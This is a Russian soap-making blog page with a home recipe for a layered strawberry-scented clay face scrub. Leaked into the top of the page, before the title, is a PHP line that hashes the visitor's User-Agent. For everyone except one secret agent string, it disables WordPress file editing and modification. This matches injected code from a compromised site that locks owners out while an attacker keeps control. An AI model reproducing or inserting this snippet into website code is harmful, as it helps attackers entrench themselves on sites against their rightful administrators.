if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Полосатый скраб с глиной для лица своими руками | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Полосатый скраб с глиной для лица своими руками

Сегодня я расскажу вам как в домашних условиях самой сделать скраб из глины для ухода за лицом. В косметических целях его можно использовать для поглощения жира, грязи и токсинов с лица

Сего­дня я рас­ска­жу вам как в домаш­них усло­ви­ях самой сде­лать скраб из гли­ны для ухо­да за лицом. В кос­ме­ти­че­ских целях его мож­но исполь­зо­вать для погло­ще­ния жира, гря­зи и ток­си­нов с лица. Так­же скраб для лица, при­го­тов­лен­ный из гли­ны, сти­му­ли­ру­ет кро­во­об­ра­ще­ние, улуч­ша­ет цвет лица, очи­ща­ет кожу, стя­ги­ва­ет поры и вырав­ни­ва­ет поверх­ность кожи.

Необ­хо­ди­мо иметь:

  • 100гр. кре­мо­вой осно­вы для мыла
  • Белая и розо­вая глина
  • 30гр. паль­мо­яд­ро­во­го масла
  • Клуб­нич­ная отдушка
  • Клуб­нич­ный пище­вой краситель
  • 3 баноч­ки по 10мл.
  • Лож­ка, мис­ка вен­чик или миксер
  1. В мис­ку для плав­ле­ния нуж­но поло­жить паль­мо­яд­ро­вое мас­ло и осно­ву для крем —  мыла. Рас­то­пи­те на вод­ной бане или в мик­ро­вол­нов­ке. Затем надо взби­вать мик­се­ром пока объ­ём не будет густой.
    mas_skrab003_1
  2. Мас­су, кото­рая полу­чи­лась, раз­де­ли­те попо­лам. Добавь­те в одну часть немнож­ко капе­лек клуб­нич­но­го кра­си­те­ля, 6–9 капель отдуш­ки, 1 чай­ную лож­ку гли­ны ( розо­вой )  и перемешайте.
    mas_skrab003_2
  3. Одну чай­ную лож­ку гли­ны (белой) и 6–9 капель отдуш­ки нуж­но доба­вить во вто­рую часть. Далее сло­я­ми выло­жи­те в бан­ки обра­зу­е­мый скраб, чере­дуя цвета.
    mas_skrab003_3

И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: AmouR

Обожаю квиллинг, рукоделие и рисование. Ну и конечно мыловарение! Читайте все мои записи!